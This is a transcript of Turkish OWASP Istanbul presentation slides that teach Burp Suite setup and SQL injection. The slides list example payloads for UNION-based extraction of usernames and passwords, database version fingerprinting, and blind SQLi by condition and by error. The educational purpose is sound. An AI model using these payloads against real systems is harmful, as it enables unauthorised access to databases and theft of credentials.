Recommended
Recommended
More Related Content
Featured
Featured (20)
Burp Suite SQL Injection Attack | OWASP Istanbul
- 2. RUMEYSA BOZDEMİR • Computer Programming - Associate Degree • Management Information System - Bachelor’s Degree • ITIL 4 Foundation Certificate in IT Service Management • ISO27001 LA - CQI|IRCA • C|EH - EC - Council • IT Expertise – BEM • Cyber Security Specialist – TUBITAK • OWASP Chapter Leaders - Istanbul @owaspistanbul - rumeysabozdemir@gmail.com
- 3. OWASP • Kar amacı gütmeyen ve yazılım güvenliğini artırmak için çalışan bir kuruluştur. • Yaklaşık 20 yıldır hizmet vermektedir. • Açık kaynak yazılım projeleri • Yüzlerce yerel bölüm • On binlerce üye • Eğitim / Konferans @owaspistanbul - rumeysabozdemir@gmail.com
- 5. OWASP INFO @owaspistanbul - rumeysabozdemir@gmail.com • Burp Suite Nedir? • Burp Suite Nasıl Kullanılır? • SQL Injection Zafiyeti Nedir? • SQL Injection Zafiyetinin Etkileri Nedir? • Sql Injectıon Örnekleri • WHERE ile Gizli Verileri Çekme • Login Bypass Etme • UNION Attack ile Sütun Sayısı Döndürme • UNION Attack ile Metin İçeren Sütun Bulma • UNION Attack ile Tablodan Veri Çekme • UNION Attack ile Bir Sütuna Birden Fazla Veri Çekme • Oracle Veritabanından Versiyon Öğrenme • MySQL ve Microsoft Veritabanı ve Versiyon Bilgisini Çekme • Oracle Dışındaki Veritabanlarında SQLi Saldırıları • Oracle Veritabanlarında SQLi Saldırıları • Koşullu Yanıtlar İle Blind SQLi Zafiyeti • Koşullu Sorgularda Hataları Yorumlayarak Blind SQLi Sömürme
- 6. OWASP | BURP SUITE NEDİR? @owaspistanbul - rumeysabozdemir@gmail.com • JAVA dilinde yazılmıştır. • Web Proxy uygulamasıdır. • Web uygulama testlerinde kullanılır.
- 7. OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com https://portswigger.net/
- 8. OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com • Uygulama için ihtiyacımız olanlar; • Burp Suite Community Edition • https://portswigger.net/burp/communitydownload • Kali Linux ya da Windows OS • https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
- 9. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
- 10. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
- 11. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
- 12. OWASP | SQL INJECTION ZAFİYETİ NEDİR? @owaspistanbul - rumeysabozdemir@gmail.com • SQL injection (SQLi), bir uygulamanın veritabanı ile iletişimi esnasında birtakım teknikleri kullanarak sorgulara müdahale etme işlemidir. • Son kullanıcının görmemesi gereken, bilmemesi gereken ya da erişmemesi gereken bilgilere erişme durumudur.
- 13. OWASP | SQL INJECTION ZAFİYETİNİN ETKİLERİ NEDİR? @owaspistanbul - rumeysabozdemir@gmail.com • İllegal şekilde yayılma, • Dark Web satış, • Parola, • Kredi kartı bilgileri, • Kişisel veriler, • Backdoor
- 14. OWASP | SQL INJECTION ÖRNEKLERİ @owaspistanbul - rumeysabozdemir@gmail.com • Gizli Verileri Çekme • Uygulama Mantığını Alt Üst Etme • UNION Saldırıları • Kullanılan Veritabanını İnceleme • Blind SQL Injection
- 15. OWASP | WHERE İLE GİZLİ VERİLERİ ÇEKME @owaspistanbul - rumeysabozdemir@gmail.com • SQL sorgusu yaparken; • SELECT, DELETE, UPDATE ve INSERT gibi değerler kullanılır. • WHERE değeri ile de tablodaki hangi sütundan veri çekilecek ise o belirtilir ve sorgular istenilen veriye/bilgiye göre şekillendirilir. ÖRNEK KULLANIM • SELECT * FROM products WHERE category = ''' AND released = 1
- 16. OWASP | LOGIN BYPASS ETME @owaspistanbul - rumeysabozdemir@gmail.com • Oturum değişkenlerine müdahale, • Texboxlara direkt komut yazma, ÖRNEK KULLANIM • Or, AND • =, -- • ‘ , (, / vb.
- 17. OWASP | UNION ATTACK İLE SÜTUN SAYISI DÖNDÜRME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT NULL, NULL— • ORDER BY 1--
- 18. OWASP | UNION ATTACK İLE METİN İÇEREN SÜTUN BULMA @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT NULL, ‘bilisimcikiz’, NULL--
- 19. OWASP | UNION ATTACK İLE TABLODAN VERİ ÇEKME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT username, password FROM users--
- 20. OWASP | UNION ATTACK İLE BİR SÜTUNA BİRDEN FAZLA VERİ ÇEKME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT NULL, username||'*'||password FROM users--
- 21. OWASP | ORACLE VERİTABANINDAN VERSİYON ÖĞRENME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT banner, 'bilisimcikiz’ FROM v$version--
- 22. OWASP | MYSQL VE MICROSOFT VERİTABANI VE VERSİYON BİLGİSİNİ ÇEKME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT @@version NULL#
- 23. OWASP | ORACLE DIŞINDAKİ VERİTABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT username_tqsccf, password_iolsok from users_jowqzh--
- 24. OWASP | ORACLE VERİTABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT PASSWORD_LBIELG, USERNAME_AMLAPI FROM USERS_MGQWPY--
- 25. OWASP | KOŞULLU YANITLAR İLE BLIND SQLi ZAFİYETİ @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • and (select username from users where username='administrator' and LENGTH(password)>19)='administrator'--
- 26. OWASP | KOŞULLU SORGULARDA HATALARI YORUMLAYARAK BLIND SQLi SÖMÜRME @owaspistanbul - rumeysabozdemir@gmail.com ÖRNEK KULLANIM • UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users--
- 29. KAYNAKLAR @owaspistanbul - rumeysabozdemir@gmail.com • https://portswigger.net/burp/communitydownload • https://portswigger.net/web-security/file-upload